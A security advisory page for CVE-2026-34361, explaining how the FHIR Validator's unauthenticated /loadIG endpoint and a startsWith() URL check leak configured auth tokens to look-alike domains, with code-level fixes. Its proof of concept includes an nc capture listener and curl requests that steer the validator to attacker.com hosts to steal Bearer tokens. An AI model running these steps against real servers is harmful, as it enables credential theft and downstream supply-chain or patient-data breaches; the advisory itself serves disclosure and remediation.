Cloud Vulnerability DB
A community-led vulnerabilities database
Wiz Agents & Workflows are here
Vulnerability DatabaseCVE-2026-34361
CVE-2026-34361:
Java vulnerability analysis and mitigation
Summary
The FHIR Validator HTTP service exposes an unauthenticated /loadIG endpoint that makes outbound HTTP requests to attacker-controlled URLs. Combined with a startsWith() URL prefix matching flaw in the credential provider (ManagedWebAccessUtils.getServer()), an attacker can steal authentication tokens (Bearer, Basic, API keys) configured for legitimate FHIR servers by registering a domain that prefix-matches a configured server URL.
Details
Step 1 — SSRF Entry Point (LoadIGHTTPHandler.java:35-43):
The /loadIG endpoint accepts unauthenticated POST requests with a JSON body containing an ig field. The value is passed directly to IgLoader.loadIg() with no URL validation or allowlisting. When the value is an HTTP(S) URL, IgLoader.fetchFromUrlSpecific() makes an outbound GET request via ManagedWebAccess.get():
// LoadIGHTTPHandler.java:43
engine.getIgLoader().loadIg(engine.getIgs(), engine.getBinaries(), igContent, true);
// IgLoader.java:437 (fetchFromUrlSpecific)
HTTPResult res = ManagedWebAccess.get(Arrays.asList("web"), source + "?nocache=" + System.currentTimeMillis());Step 2 — Credential Leak via Prefix Matching (ManagedWebAccessUtils.java:14):
When ManagedWebAccess creates a SimpleHTTPClient, it attaches an authProvider that uses startsWith() to determine whether credentials should be sent:
// ManagedWebAccessUtils.java:14
if (url.startsWith(serverDetails.getUrl()) && typesMatch(serverType, serverDetails.getType())) {
return serverDetails;
}If the server has https://packages.fhir.org configured with a Bearer token, a request to https://packages.fhir.org.attacker.com/... matches the prefix, and the token is attached to the request to the attacker's domain.
Step 3 — Redirect Amplification (SimpleHTTPClient.java:84-99,111-118):
SimpleHTTPClient manually follows redirects with setInstanceFollowRedirects(false). On each redirect hop, getHttpGetConnection() calls setHeaders() which re-evaluates authProvider.canProvideHeaders(url) against the new URL. This means even an indirect redirect path can trigger credential leakage.
PoC
Prerequisites: A FHIR Validator HTTP server running with fhir-settings.json containing:
{
"servers": [{
"url": "https://packages.fhir.org",
"authenticationType": "token",
"token": "ghp_SecretTokenForFHIRRegistry123"
}]
}Step 1: Set up attacker credential capture server:
# On attacker machine, listen for incoming requests
nc -lp 80 > /tmp/captured_request.txt &
# Register DNS: packages.fhir.org.attacker.com -> attacker IPStep 2: Trigger the SSRF with prefix-matching URL:
curl -X POST http://target-validator:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "https://packages.fhir.org.attacker.com/malicious-ig"}'Step 3: Verify credential capture:
cat /tmp/captured_request.txt
# Expected output includes:
# GET /malicious-ig?nocache=... HTTP/1.1
# Authorization: Bearer ghp_SecretTokenForFHIRRegistry123
# Host: packages.fhir.org.attacker.comRedirect variant (if direct prefix match isn't possible):
# Attacker server returns: HTTP/1.1 302 Location: https://packages.fhir.org.attacker.com/steal
curl -X POST http://target-validator:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "https://attacker.com/redirect"}'Impact
- Credential theft: Attacker steals Bearer tokens, Basic auth credentials, or API keys for any configured FHIR server
- Supply chain attack: Stolen package registry credentials could be used to publish malicious FHIR packages affecting downstream consumers
- Data breach: If credentials grant access to protected FHIR endpoints (e.g., clinical data repositories), patient health records could be exposed
- Scope change (S:C): The vulnerability in the validator compromises the security of external systems (FHIR registries, package servers) whose credentials are leaked
Recommended Fix
Fix 1 — Proper URL origin comparison in ManagedWebAccessUtils (ManagedWebAccessUtils.java):
public static ServerDetailsPOJO getServer(Iterable<String> serverTypes, String url, Iterable<ServerDetailsPOJO> serverAuthDetails) {
if (serverAuthDetails != null) {
for (ServerDetailsPOJO serverDetails : serverAuthDetails) {
for (String serverType : serverTypes) {
if (urlMatchesOrigin(url, serverDetails.getUrl()) && typesMatch(serverType, serverDetails.getType())) {
return serverDetails;
}
}
}
}
return null;
}
private static boolean urlMatchesOrigin(String requestUrl, String serverUrl) {
try {
URL req = new URL(requestUrl);
URL srv = new URL(serverUrl);
return req.getProtocol().equals(srv.getProtocol())
&& req.getHost().equals(srv.getHost())
&& req.getPort() == srv.getPort()
&& req.getPath().startsWith(srv.getPath());
} catch (MalformedURLException e) {
return false;
}
}Fix 2 — URL allowlisting in LoadIGHTTPHandler (LoadIGHTTPHandler.java):
// Add allowlist validation before loading
private static final Set<String> ALLOWED_HOSTS = Set.of(
"packages.fhir.org", "packages2.fhir.org", "build.fhir.org"
);
private boolean isAllowedSource(String ig) {
try {
URL url = new URL(ig);
return ALLOWED_HOSTS.contains(url.getHost());
} catch (MalformedURLException e) {
return false; // Not a URL, could be a package reference
}
}Source: NVD
Related Java vulnerabilities:
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Additional Wiz resources
Get a personalized demo
Ready to see Wiz in action?
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management